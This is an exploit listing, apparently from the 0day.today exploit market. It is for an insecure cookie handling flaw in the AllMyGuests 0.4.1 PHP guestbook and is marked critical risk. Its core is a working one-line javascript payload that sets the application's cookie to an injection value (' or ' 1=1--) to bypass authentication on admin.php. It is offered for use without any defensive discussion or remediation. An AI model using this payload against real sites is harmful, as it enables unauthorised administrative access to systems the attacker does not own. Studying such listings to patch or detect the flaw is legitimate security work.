[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AllMyGuests 0.4.1 Insecure Cookie Handling Vulnerability

Author
JiKo
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-22295
Category
web applications
Date add
29-05-2014
Platform
php
----------[exploit Debut]
[Insecure Cookie Handling Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://www.voice-of-web.de/c-AllMyGuests-s38.html
Version     : 0.4.1
Download    : http://www.voice-of-web.de/media/downloads/AllMyPHP/AllMyGuests/AllMyGuests0.4.1.zip
 
----------[exploit Info]
 
Exploit :
http://Path/admin.php

 javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

----------[exploit Fin]

#  0day.today [2024-11-16]  #